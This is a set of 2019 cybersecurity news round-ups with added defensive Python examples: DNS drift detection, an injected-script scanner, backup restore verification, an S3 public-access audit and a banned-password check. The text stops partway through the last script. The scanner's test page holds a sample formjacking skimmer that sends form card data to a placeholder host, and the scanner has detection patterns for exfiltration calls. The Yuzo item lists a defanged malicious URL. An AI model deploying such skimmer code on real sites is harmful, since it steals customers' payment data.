These types of account compromise hacks are now all too common as more people and organisations move to web and cloud-based services. Never assume that just because you are moving to the cloud these services are fully secure. Always review and understand the security that is in place so you can fill any gaps that exist.

Email phishing attacks are the primary method used by hackers trying to steal user credentials (usernames and passwords). Always check emails thoroughly to ensure they are from a trusted source and never click on any misspelt or suspicious links. If in doubt about an email, just delete it.

Read More on Bitdefender …

Cisco Talos: Sea Turtle DNS Hijacking Campaign

A new DNS Hijacking campaign has been discovered by the Talos research team which has been targeting national security, public and private organisations since early 2017.

The campaign, dubbed ‘Sea Turtle’ by Talos, has been primarily focused on countries in the Middle East and North Africa, and has so far impacted at least 40 organisations across 13 different countries. In addition, a secondary group of victims have also been targeted which includes Internet Service Providers and Domain registrars.

DNS hijacking is a technique that allows an actor to control an organisation’s domain name space, giving them the ability to redirect traffic to hacker-controlled servers.

Talos believe that this is the work of a state sponsored actor that is trying to achieve persistent access to its target network environments, with a goal of gaining access to sensitive information and intelligence. These are highly capable actors, who are responsible for the first confirmed case of a Domain name registry compromise.

Organisations typically forget about securing their external services such as DNS, but these can be an easy target if not included in your overall security strategy. Where available it is recommended to implement Multi-Factor Authentication (aka Two Factor Authentication or Two-Step Verification) on your external DNS accounts. As per Talos recommendations you can also consider a registry lock service, which requires separate authentication / approval before any DNS changes can be made.
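One detection control that follows from the Talos advice above is to baseline your public DNS records and alert when they drift, since a hijack at the registrar or authoritative server shows up as an NS, A or MX record nobody changed on purpose. The script below is an added example written for this round-up, not Talos or Ironshare code; the two record snapshots are constructed using reserved example domains and addresses, and in practice the observed snapshot would be built from resolver output against both your authoritative servers and the registrar’s view, because this campaign changed records at the registry level.

```python
"""Detect drift between a DNS baseline and a fresh snapshot (added example).

DNS hijacking shows up as unexpected changes to NS, A/AAAA or MX records
at the registrar or authoritative server, so a periodic diff against a
known-good baseline is a cheap detection control.
"""
from dataclasses import dataclass

# Constructed snapshots in "name TYPE value" form. A real deployment would
# build the observed snapshot from resolver output (e.g. dig) each run.
BASELINE = """
# known-good records, captured at change-control time
example.com.       NS  ns1.example-dns.net.
example.com.       NS  ns2.example-dns.net.
example.com.       A   192.0.2.10
mail.example.com.  A   192.0.2.25
"""

OBSERVED = """
example.com.       NS  ns1.example-dns.net.
example.com.       NS  ns1.rogue-dns.example.
example.com.       A   192.0.2.10
mail.example.com.  A   198.51.100.7
"""

# Record types whose unexpected change most strongly indicates a hijack.
SEVERITY = {"NS": "critical", "SOA": "critical", "MX": "high", "A": "high", "AAAA": "high"}


@dataclass(frozen=True)
class Finding:
    name: str
    rtype: str
    expected: tuple
    observed: tuple
    severity: str


def parse_snapshot(text):
    """Parse 'name TYPE value' lines into {(name, TYPE): {values}}.

    Names and values are lower-cased and stripped of the trailing dot so
    that cosmetic differences between tools do not register as drift.
    """
    records = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, rtype, value = line.split(maxsplit=2)
        key = (name.lower().rstrip("."), rtype.upper())
        records.setdefault(key, set()).add(value.lower().rstrip("."))
    return records


def detect_drift(baseline, observed):
    """Return one Finding per (name, type) whose value set differs."""
    findings = []
    for key in sorted(set(baseline) | set(observed)):
        expected = baseline.get(key, set())
        seen = observed.get(key, set())
        if expected != seen:
            findings.append(Finding(key[0], key[1], tuple(sorted(expected)),
                                    tuple(sorted(seen)), SEVERITY.get(key[1], "medium")))
    return findings


def run_check():
    """Diff the constructed snapshots; returns the list of findings."""
    return detect_drift(parse_snapshot(BASELINE), parse_snapshot(OBSERVED))


if __name__ == "__main__":
    for f in run_check():
        print(f"[{f.severity}] {f.name} {f.rtype}: expected {f.expected}, observed {f.observed}")
```

Run it from a scheduled job and page on any critical finding; the baseline should only ever be updated through the same change-control step that approves the DNS change itself, otherwise the check learns the hijack as the new normal.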

Read more on Talos Intelligence ….

Facebook Grabs Email Contacts for 1.5 million Users

Well it wouldn’t seem a normal week without mentioning another Facebook privacy issue. This time the social media giant is being criticised for harvesting the email contact information of 1.5 million new users.

We mentioned in a previous issue how Facebook were requesting access to users’ email accounts in order to verify their identity; it seems from this latest issue that this was not the only reason they wanted access to the email accounts of new users.

As part of this verification process, which appears to have run for almost 3 years, Facebook used the email verification step to take copies of the email account’s contact list without the explicit permission of the user.

Facebook have stated that they have now changed the way they process new users and that email contacts are no longer being uploaded to its platform.

What is evident is that users are no longer going to tolerate the poor privacy and data handling practices of Facebook, with approx. 15 million users in the US alone closing their accounts in the last 2 years and looking for alternative social media platforms.

Read more on BBC ….

And that’s it for this week’s round-up, we hope you have a happy Easter and enjoy the bank holiday weekend. Please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #37 – 19th April 2019

By Stuart Hare on 19/4/19

Cyber Round-up

Cyber Round-up for 12th April

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

  • Microsoft Patch Tuesday April 19
  • Newham Council Fined by ICO for Gang Data Leak
  • Ethical Hackers Breach University Networks in Two Hours
  • Yuzo WordPress Plugin Exploit Sends Users to Scam Sites
  • DragonBlood Vuln Found in Wi-Fi WPA3

Microsoft Patch Tuesday April 19

It’s that time of the month again where Microsoft release the news on their vulnerable products and the patches available to fix them. This month there are a total of 74 vulnerabilities disclosed, with 16 rated Critical, 54 Important, 1 Moderate and 3 Low.

These updates cover issues found in software products such as MS Windows Operating Systems, Internet Explorer, MS Edge, Office, MS Exchange Server, the scripting engine, Team Foundation Server and more.

CVE-2019-0803 & CVE-2019-0859 cover two vulnerabilities rated Important that exist in the Win32K component of the Windows operating system. By failing to handle memory objects properly, these vulns allow an attacker to run code in kernel mode and elevate their privileges, so they can view, change and delete data. New accounts could also be created with full user rights.

Note that both of these vulns are currently being actively exploited in the wild, so it’s very important to address these quickly.

Read more ….

Newham Council Fined by ICO for Gang Data Leak

Last week it was reported that the ICO have fined London-based Newham Council £145,000 after it was responsible for leaking the personal information of alleged gang members.

After the London Riots in 2011 the Met Police created a database that captured intelligence identifying possible gang members, based on their history of violent crime and other information provided by local councils.

An unredacted copy of information from this database was leaked in 2017, after a Newham council worker sent the list in an email to 44 recipients, which included both internal departments and numerous external organisations.

Through the use of Snapchat, photographic copies of this list found their way into the hands of rival gang members. Although there was an increased level of gang related violence that year, it is unclear whether this data leak was the cause.

We are unfortunately all too familiar with the constant data breaches we see in the news each week, often resulting in personal and financial information loss, but rarely do we see breaches such as this that directly threaten human life.

This drills home the importance and simple fact that organisations of all types and sizes are still not doing enough to secure their data and educate their users on how to use it, both appropriately and securely.

Read More on BBC …

Ethical Hackers Breach University Networks in Two Hours

UK University networks have been subject to a series of tests in order to understand how good their defences were against cyber-attacks. Unfortunately, the results of these tests have highlighted that in every case valuable data was obtained within two hours.

These penetration tests were jointly organised by JISC (the Joint Information Systems Committee) and HEPI (Higher Education Policy Institute) and were scheduled to take place against 50 universities in the UK.

Ethical Hackers from JISC’s in-house team were tasked with carrying out the tests, which not only saw a 100% success rate against all tested universities, but also reached personal information for staff and students, and accessed research databases, within two hours of starting the test.

It won’t be a surprise to most familiar with cyber security that spear phishing attacks were the most effective method used in these tests.

Spear phishing attacks use crafted emails that are sent to specific targets within an organisation, pretending to be from a trusted source, with the intent to convince the user to click on a bad link or download malicious attachments / software.

Universities hold a wealth of valuable information for both cyber criminals and nation state actors working for foreign governments. Not only do they contain a vast amount of personal information for staff and students, but they also store research data and intellectual property that is of great value to these foreign governments.

These tests highlight how vulnerable our UK universities are to cyber-attack, meaning greater focus on improving cyber defences is urgently required.

Talking to the BBC, a spokeswoman for UK Universities stated that they are now working with the UK’s National Cyber Security Centre (NCSC), to help improve and strengthen security practices to better protect the sector from cyber threats.

Read more on BBC ….

Yuzo WordPress Plugin Exploit Sends Users to Scam Sites

An exploited vulnerability has been identified in the popular Yuzo Related Posts WordPress plugin, which allows attackers to inject malicious JavaScript into the pages of the target system’s website.

Exploiting this vuln allows an unauthenticated attacker to modify the plugin’s settings to a value that includes malicious JavaScript. Once the JavaScript is injected it can be used to redirect visitors of the compromised website to attacker-controlled websites or fraudulent scam sites.

The JavaScript used here contains a redirect that sends visitors to the following URL:

httpx://hellofromhony[.]org/counter

Once the user reaches this URL, numerous other redirects occur, which eventually lead them to various scam sites, including a tech support scam page.

Researchers at Wordfence believe that this exploit shares a lot of commonalities with two other vulns, found in the Social Warfare and Easy WP SMTP plugins. The same IP address (176[.]123[.]9[.]53) used for accessing the URL above was also used in these previous exploits, both of which delivered malicious redirects as part of their campaigns.

This vulnerability is believed to impact over 60,000 sites that currently have this plugin actively installed within WordPress. The plugin developer became aware of this vuln and on March 30th the plugin was removed from the WordPress Plugin directory. This prevented any new users from downloading the plugin, but left existing users still exposed.

The exploitation of this vulnerability has been the unfortunate result of a security researcher’s irresponsible actions: they publicly disclosed the vuln along with a proof of concept, prior to a fix being released by the developer.

Website JavaScript injection has become a common method for attackers in recent times. Formjacking techniques such as those used by the Magecart exploit in the Ticketmaster and British Airways breaches last year, have been used to steal customer credit card information from the website, without having to compromise the server or network infrastructure first.

The developer recommends that any users of their Yuzo Related Posts plugin should remove it from their WordPress site immediately, until they can release a fix for this vulnerability.

To protect yourself from these types of WordPress threats, always ensure that your WordPress site and its plugins are kept up to date with the latest versions of software.

In addition, WordPress users should also strongly consider the use of a WordPress or Web Application Firewall, to provide an extra layer of defence against such web attacks.
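Because both the Yuzo redirect and the Magecart-style formjacking described above arrive as JavaScript injected into pages the site itself serves, a content check run against your own pages catches them before a visitor does. The scanner below is an added example written for this round-up, not Wordfence’s or the plugin developer’s code; the sample page and every hostname in it (shop.example, cdn.example, redirect-tracker.example, stats-collector.example) are constructed placeholders, not indicators from the campaigns described.

```python
"""Scan served HTML for injected redirects and formjacking patterns (added example).

The checks are deliberately simple: inline scripts that send the browser to a
host outside the allowlist, inline scripts that hook form submission and post
data to an outside host, and external script sources outside the allowlist,
which is where card skimmers are usually loaded from.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate inline script, one Yuzo-style
# redirect injection and one formjacking skimmer. Hostnames are placeholders.
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Example store</title>
<script src="/assets/app.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script>console.log("page ready");</script>
</head><body>
<div class="related-posts">
<script>window.location = "https://redirect-tracker.example/counter";</script>
</div>
<form id="checkout"><input name="card"><input name="cvv"></form>
<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var data = {};
  document.querySelectorAll("input").forEach(function (i) { data[i.name] = i.value; });
  fetch("https://stats-collector.example/collect", {method: "POST", body: JSON.stringify(data)});
});
</script>
</body></html>
"""

FIRST_PARTY_HOSTS = {"shop.example"}  # hosts allowed to serve scripts or receive data

REDIRECT_RE = re.compile(
    r"(?:window|document|top|self)?\.?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^'\"\s)]+", re.IGNORECASE)
FORM_HOOK_RE = re.compile(r"addEventListener\(\s*['\"](?:submit|keyup|change)['\"]|\.onsubmit\s*=",
                          re.IGNORECASE)
EXFIL_RE = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon\(|new\s+Image\(", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _foreign_host(url, allowed):
    """Return the lower-cased host if it is outside the allowlist, else None."""
    host = urlparse(url).hostname
    return host.lower() if host and host.lower() not in allowed else None


def audit_page(html, allowed_hosts=FIRST_PARTY_HOSTS):
    """Return (kind, host) findings for the given HTML document, in page order."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = _foreign_host(src, allowed_hosts)
        if host:
            findings.append(("external-script", host))
    for body in parser.inline:
        for match in REDIRECT_RE.finditer(body):
            host = _foreign_host(match.group(1) or match.group(2), allowed_hosts)
            if host:
                findings.append(("redirect", host))
        if FORM_HOOK_RE.search(body) and EXFIL_RE.search(body):
            for url in URL_RE.findall(body):
                host = _foreign_host(url, allowed_hosts)
                if host:
                    findings.append(("formjacking-pattern", host))
    return findings


if __name__ == "__main__":
    for kind, host in audit_page(SAMPLE_PAGE):
        print(f"{kind}: {host}")
```

Treat an external-script finding as a review item (a CDN you use on purpose belongs in the allowlist) and a redirect or formjacking-pattern finding as an incident. Fetching the checkout page through the same path a customer uses, rather than reading files on the server, matters here: the Yuzo payload lived in a plugin option and only appeared in rendered output.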

Read more on WordFence ….

DragonBlood Vuln Found in Wi-Fi WPA3

As with most new technologies it’s never plain sailing when it comes to developing secure solutions, and it’s been no different with the new Wi-Fi security standard WPA3.

The WPA3 or Wi-Fi Protected Access 3 protocol is the next generation in Wi-Fi security and is due to replace the aging and less secure WPA2 protocol we use today.

In their April 10th press release the Wi-Fi Alliance have issued an update on two identified vulns found in a limited number of early implementations of WPA3-Personal, where devices running attacker software can capture information and expose passwords due to improper implementation of cryptographic functions.

Researchers have released a paper titled DragonBlood that covers the two vulns. The first is a downgrade attack that forces WPA3-supported devices to connect using an insecure WPA2 handshake. This is then followed by the second flaw, which incorporates two side-channel attacks that lead to the attackers obtaining the Wi-Fi password through an offline dictionary-style attack.

The Wi-Fi Alliance state that multiple CVEs have been raised under the IDs CVE-2019-9494 to CVE-2019-9499 to cover these flaws, but limited information is currently available from Mitre.

A simple software update is already available from the small number of device manufacturers affected by these WPA3 flaws.

More details can be found on The Hackers News website.

Read more on The Hacker News ….

And that’s it for this week’s round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #36 – 12th April 2019

By Stuart Hare on 11/4/19

Security Advisory Archives

Microsoft Patch Tuesday April 19

It’s that time of the month again where Microsoft release the news on their vulnerable products and the patches available to fix them. This month there are a total of 74 vulnerabilities disclosed, with 16 rated Critical, 54 Important, 1 Moderate and 3 Low.

These updates cover issues found in software products such as MS Windows Operating Systems, Internet Explorer, MS Edge, Office, MS Exchange Server, the scripting engine, Team Foundation Server and more.

CVE-2019-0803 & CVE-2019-0859 cover two vulnerabilities rated Important that exist in the Win32K component of the Windows operating system. By failing to handle memory objects properly, these vulns allow an attacker to run code in kernel mode and elevate their privileges, so they can view, change and delete data. New accounts could also be created with full user rights.

Note that both of these vulns are currently being actively exploited in the wild, so it’s very important to address these quickly.

Never too far away from a security issue, Server Message Block (SMB) appears this month with a critical privilege escalation and remote code execution vuln. CVE-2019-0786 can be exploited by an attacker using a specially crafted file over the SMB protocol, allowing them to bypass security checks in the operating system. This can lead to a complete system takeover by the remote attacker.

One of the biggest CVSS scores of the month (7.8) goes to the GDI+ remote code execution vuln covered by CVE-2019-0853. Again, this is another case of improper memory object handling but this time in the Windows Graphics Device Interface.

This can be exploited in two different ways: via a web-based attack which lures users into accessing a malicious website, or via a file-sharing attack where attackers convince the user to open a malicious document. When successfully exploited the target system can be completely controlled by a remote attacker.

Five of the 16 critical vulns in this release exist in the MS XML Core Services parser process. CVE-2019-0790 to CVE-2019-0793 & CVE-2019-0795 all cover a remote code execution vuln that can result in the bad guys taking control of the target system.

These can be exploited through the use of a phishing email and a malicious website, where attackers can use the users’ web browsers to launch MS XML and run their malicious code remotely.

Known Issues

There are several known issues highlighted in this month’s Patch Tuesday, so please review the release notes to ensure these are understood.

One such issue appears in the Windows 2008 SP2 operating system, where the updates can get stuck on stage 2 or 3 of the restart process.

This is due to Microsoft releasing a new servicing stack update (SSU), which all users of Windows 2008 SP2 will need to install to ensure they can continue to receive the latest security updates.

This SSU is required for the operating system to support future fixes and updates that are signed with the SHA-2 hashing algorithm.

Microsoft recommends that users install the servicing stack update before trying to install this month’s updates / rollup, to prevent the above-mentioned stuck at stage x issue.

If you have started the update and you get the stuck message, don’t worry, simply press Ctrl + Alt + Delete and login. MS believe that this stuck issue should only happen once.

For more info on the SSU click here.

It is important to review this month’s updates and get patching as soon as you possibly can!

Keeping up to date with security patches for your operating systems and software is a critical part of delivering and maintaining a strong security posture. Please ensure you test and update as quickly as possible to reduce risk, prevent exploitation and ultimately stay secure.

For a full list of this month’s updates please see the links below:

Patch Tuesday release notes

Security update guidance

By Stuart Hare on 10/4/19

Cyber Round-up

Cyber Round-up for 5th April

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

  • Arizona Beverages Hit by Ransomware Attack
  • Facebook Privacy Woes Continue
  • More Concerns on Huawei Security
  • Microsoft Introduce AAD Password Protection

Arizona Beverages Hit by Ransomware Attack

Arizona Beverages, a large US-based beverage supplier, has this week been recovering from a devastating ransomware attack that left the company unable to operate for several days.

Two weeks on from the initial infection and they are still not back to a fully restored service, although they are now up and running with their sales operation.

It is believed that the infection was the iEncrypt ransomware, a possible variant of BitPaymer, which resulted in over 200 Windows based servers, PCs and laptops having their data encrypted and rendering them useless.

Although not confirmed, it is understood that the initial infection was introduced through a malicious email attachment, and like BitPaymer, it is highly likely that this was delivered using the Emotet trojan.

Once the infection was detected, AB staff were instructed that their computers could be compromised and that they should not power on their devices, copy files or connect to the network.

As there is no known decryption tool for iEncrypt, AB had limited options for recovering from the attack, and this got significantly worse when, 24 hours later, IT staff found that the backup solution had been misconfigured and could not be used to restore the service.

It is believed that Arizona Beverages lost millions of dollars per day in lost sales while they were down.

Several big mistakes appear to have been made leading up to and during this attack:

  • Servers and operating systems were running out-of-date, unsupported software versions.
  • They were lacking an effective patch management process, with most devices not being patched for some time.
  • A robust incident response process was not in place, and the company took nearly a week to call in incident response experts from Cisco to assist with the attack investigation and recovery.
  • Backups and restorations were never tested or verified as successful, resulting in a failure to restore post attack.

The true depth of the damage caused may not be known for some time, but we encourage organisations to learn from the mistakes of others. Be prepared so you can effectively protect and react in the event that you become the victim.
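The last mistake in that list, untested backups, is the one that turned an outage into a multi-day loss, and it is also the easiest to automate away. The script below is an added example written for this round-up, not Arizona Beverages’ or Cisco’s tooling: it builds a hash manifest of a directory, takes a tar.gz backup, restores it into a scratch directory and compares every file against the manifest. The data set is constructed, and the misconfigured backup job that silently skips a subdirectory is simulated to show what the verification reports.

```python
"""Verify that a backup can actually be restored (added example).

A backup that was never restored is only a hope. This builds a SHA-256
manifest of the source tree, restores the archive into a scratch directory
and compares the result file by file, so a misconfigured job (wrong path,
excluded directory, truncated archive) is caught on the day it is taken
rather than on the day it is needed.
"""
import hashlib
import pathlib
import tarfile
import tempfile


def build_manifest(root):
    """Map relative POSIX path -> SHA-256 hex digest for every file under root."""
    root = pathlib.Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def create_backup(src, archive_path, exclude_prefix=None):
    """Write src to a tar.gz. exclude_prefix simulates a misconfigured job."""
    def keep(member):
        if exclude_prefix and member.name.startswith(exclude_prefix):
            return None  # returning None drops the member (and its subtree)
        return member
    with tarfile.open(archive_path, "w:gz") as tar:
        tar.add(str(src), arcname=".", filter=keep)


def safe_extract(archive_path, dest):
    """Extract only regular files and directories, refusing paths that escape dest."""
    dest = pathlib.Path(dest).resolve()
    with tarfile.open(archive_path, "r:gz") as tar:
        for member in tar.getmembers():
            target = (dest / member.name).resolve()
            if target != dest and dest not in target.parents:
                raise ValueError(f"unsafe path in archive: {member.name}")
            if member.isdir():
                target.mkdir(parents=True, exist_ok=True)
            elif member.isfile():
                target.parent.mkdir(parents=True, exist_ok=True)
                with tar.extractfile(member) as fh:
                    target.write_bytes(fh.read())
            else:  # symlinks, devices etc. are not expected in this data set
                raise ValueError(f"unsupported member type: {member.name}")


def verify_restore(archive_path, expected):
    """Restore into a scratch dir and diff against the manifest.

    Returns (ok, problems); problems is a sorted list of readable strings.
    """
    with tempfile.TemporaryDirectory() as scratch:
        try:
            safe_extract(archive_path, scratch)
        except (tarfile.TarError, ValueError, EOFError, OSError) as exc:
            return False, [f"restore failed: {exc}"]
        restored = build_manifest(scratch)
    problems = [f"missing: {rel}" for rel in expected if rel not in restored]
    problems += [f"hash mismatch: {rel}" for rel, digest in expected.items()
                 if rel in restored and restored[rel] != digest]
    problems += [f"unexpected: {rel}" for rel in restored if rel not in expected]
    return not problems, sorted(problems)


def demo():
    """Back up a constructed data set correctly and with a misconfigured job."""
    with tempfile.TemporaryDirectory() as work:
        work = pathlib.Path(work)
        src = work / "data"
        (src / "db").mkdir(parents=True)
        (src / "config.ini").write_text("[app]\nmode = prod\n")
        (src / "db" / "orders.sql").write_text("INSERT INTO orders VALUES (1, 'widget');\n")
        manifest = build_manifest(src)

        good = work / "nightly.tar.gz"
        create_backup(src, good)
        # The "misconfigured" job silently leaves out the database directory.
        bad = work / "nightly-misconfigured.tar.gz"
        create_backup(src, bad, exclude_prefix="./db")
        return {"good": verify_restore(good, manifest),
                "misconfigured": verify_restore(bad, manifest)}


if __name__ == "__main__":
    for name, (ok, problems) in demo().items():
        print(f"{name}: {'OK' if ok else 'FAILED'} {problems}")
```

The manifest is computed from the live source at backup time and stored with the archive, so the check answers the question that mattered here: not “did the job finish” but “can I get every file back, unchanged”. Restoring into a scratch directory rather than in place also exercises the archive itself, which is where a ransomware incident tends to find the gaps.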

Read more on TechCrunch….

Facebook Privacy Woes Continue

In the last couple of years Facebook have been taking a lot of stick due to numerous screw-ups with data privacy and security. It has gotten no better for them this week, as they were hit with a double whammy of privacy concerns.

The first and biggest screw-up came in the form of another data breach, this time 540 million Facebook users’ records have been left exposed online by a third-party developer.

Researchers at UpGuard discovered the breach, which was caused by a third-party media company called Cultura Colectiva, after they left the records available and unsecured in Amazon S3 buckets.

Amazon S3, short for Simple Storage Service, is commonly used by developers to provide an easy way to store and retrieve data. Unfortunately though, with no password protection on these S3 buckets, the data was freely accessible to anyone on the internet.
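A bucket exposed like this is usually the result of a policy statement or ACL grant that names everyone as the principal, and both are visible through the S3 API before any data leaks. The audit below is an added example written for this round-up, not UpGuard’s or Amazon’s tooling: it takes a bucket policy document and an ACL grant list in the shapes the S3 API returns and flags anything granted to the world. The bucket name, account id and role in the sample documents are constructed placeholders; the leaky bucket mirrors the open configuration described above, the hardened one scopes the same read to a single IAM role.

```python
"""Flag S3 bucket policies and ACLs that grant access to everyone (added example).

Input shapes follow what the S3 API returns for GetBucketPolicy (a JSON
policy document) and GetBucketAcl (a list of grants); the documents here
are constructed samples.
"""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

# Constructed: the leaky configuration, readable by anyone on the internet.
LEAKY_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::constructed-export-bucket/*",
    }],
})
LEAKY_ACL = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
]

# Constructed: the same read access scoped to one IAM role in one account.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "RoleRead",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/ExportReader"},
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::constructed-export-bucket",
                     "arn:aws:s3:::constructed-export-bucket/*"],
    }],
})
HARDENED_ACL = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
]


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal):
    """True for Principal "*" or {"AWS": "*"}, i.e. anonymous access."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_policy_statements(policy_doc):
    """List Allow statements that grant an action to everyone without a Condition.

    Simplification: any Condition block is treated as narrowing the grant
    (e.g. to a VPC endpoint or source IP range); AWS's own public-access
    evaluation inspects the condition keys in more detail.
    """
    findings = []
    for stmt in _as_list(json.loads(policy_doc).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_anyone(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue
        for action in _as_list(stmt.get("Action", [])):
            for resource in _as_list(stmt.get("Resource", [])):
                findings.append(f"policy grants {action} to everyone on {resource}")
    return findings


def public_acl_grants(grants):
    """List ACL grants to the AllUsers or AuthenticatedUsers groups."""
    findings = []
    for grant in grants:
        uri = grant.get("Grantee", {}).get("URI")
        if uri in (ALL_USERS, AUTH_USERS):
            who = "everyone" if uri == ALL_USERS else "any AWS account"
            findings.append(f"ACL grants {grant.get('Permission')} to {who}")
    return findings


def audit_bucket(policy_doc, acl_grants):
    """Combine policy and ACL findings; an empty list means nothing public was found."""
    return public_policy_statements(policy_doc) + public_acl_grants(acl_grants)


if __name__ == "__main__":
    for label, policy, acl in (("leaky", LEAKY_POLICY, LEAKY_ACL),
                               ("hardened", HARDENED_POLICY, HARDENED_ACL)):
        print(label, audit_bucket(policy, acl) or ["no public access found"])
```

Note that the AuthenticatedUsers group is reported as well: it means any AWS account holder, not your users, and is public for practical purposes. At account level, Amazon’s S3 Block Public Access setting overrides both mechanisms and is the control to turn on first; an audit like this is still useful for the buckets that predate it or that legitimately serve public content.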

The exposed data contained Facebook account information that included names, email addresses, Facebook IDs, photos, check-ins, friend lists, interests, and more.

This at least might take the heat off the Cambridge Analytica issue - with data of only 87 million users shared with the 3rd party, it pales in comparison to this new breach of privacy.

It doesn’t end there though, Facebook are now asking users for their email account password to continue using the service. This has obviously raised more than a few eyebrows across the security industry. The message states:

“To continue using Facebook, you’ll need to confirm your email address. Because you signed up with [email address], you can do that automatically …”

By doing this you are basically giving Facebook access to your email account, which they should not be asking for. Facebook have stated that this information is not stored, but in the light of a lot of other issues in this area, can they be trusted.

Facebook have apparently acknowledged that this is not the right thing to do:

“We understand the password verification option isn’t the best way to go about this, so we are going to stop offering it,”

There is no legitimate reason for them to require your email account and password. So if you see this message our advice is to not enter your details and refrain from using Facebook until they remove this.

Read More on grahamcluley.com & The Daily Beast ….

More Concerns on Huawei Security

Like Facebook, the Chinese tech and telecoms giant Huawei are only too familiar with concerns over the security and privacy of their products. It's been a standing concern with western governments that Huawei products may not be safe, due to the possibility of Chinese government involvement and the potential for backdoors in their products that could be used for espionage and infiltration.

These concerns may have been realised to some extent this week, with reports of a flaw discovered by Microsoft researchers in the Huawei MateBook laptops.

A sophisticated flaw appears to have been inserted during the manufacturing of the products, that would allow an attacker to not only spy on the machine and its user, but also take full control of the target computer.

It is understood that this flaw may be linked to the NSA’s DoublePulsar back door that was leaked by the Shadowbrokers back in 2017, although it is unclear at what point in the manufacturing process this exploit was introduced.

According to the BBC there are no signs that Huawei have done anything malicious, and there is a possibility that this could have occurred upstream in the supply chain.

Huawei are a big player in the new 5G network infrastructure and services, where there has been equal concern, and unfortunately incidents such as this will not help their case in convincing governments that their products are indeed safe to use.

Read more on BBC ….

Microsoft Introduce AAD Password Protection

Since last year Microsoft have been working on improved mechanisms for password security, and after running a preview release, Azure Active Directory Password Protection is now on general release for Azure AD Premium subscribers.

AAD Password Protection gives administrators the ability to add an additional layer of security for users of Microsoft cloud and hybrid environments, by preventing them from setting poor passwords that may be easy to guess or have been found in known data breaches.

This new feature will make it easier for organisations to ensure users are creating better passwords, and significantly harder for malicious actors to launch successful password spray attacks against their users and systems.

This new feature can protect accounts in Azure AD and in hybrid on-premises Windows Server Active Directory deployments. It uses a banned list of 500 of the most common passwords, a banned password algorithm and a custom password blacklist that can be controlled by the organisation’s administrators.

As with all elements of security, things can change very quickly, and it’s no different here. Microsoft’s security research and analysis teams ensure that any changes or additions to this feature and its lists are constantly updated as they become available.

In the event that users try to configure a banned password they will be presented with the following error message:

"Unfortunately, your password contains a word, phrase, or pattern that makes your password easily guessable. Please try again with a different password."
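To make the "banned password algorithm" concrete, here is an illustrative checker written for this post; it is not Microsoft's implementation. It follows the same idea the feature describes (normalise common character substitutions, look for global and custom banned words, then score what is left) but the banned lists are tiny constructed samples and the five-point threshold and one-point-per-match scoring are simplifications chosen for the demo.

```python
"""Illustrative banned-password check in the spirit of Azure AD Password
Protection. Added example; not Microsoft's implementation. The lists are
constructed samples and the scoring rule (a password needs at least
MIN_POINTS; each banned word found counts 1, every other character
counts 1) is a simplification chosen for this demo.
"""

# Constructed stand-in for the "global banned password list".
GLOBAL_BANNED = {"password", "letmein", "welcome", "qwerty", "iloveyou"}

# Organisation-specific words an administrator would add to the custom list.
CUSTOM_BANNED = {"ironshare", "contoso"}

# Common character substitutions that users (and password crackers) rely on;
# undoing them stops "P@ssw0rd" slipping past a list that contains "password".
SUBSTITUTIONS = str.maketrans({"0": "o", "1": "l", "$": "s", "@": "a", "3": "e", "!": "i"})

MIN_POINTS = 5

ERROR_MESSAGE = ("Unfortunately, your password contains a word, phrase, or pattern "
                 "that makes your password easily guessable. "
                 "Please try again with a different password.")


def normalise(password: str) -> str:
    """Lower-case the password and undo common substitutions."""
    return password.lower().translate(SUBSTITUTIONS)


def score(password: str, banned: set):
    """Return (points, matched banned words).

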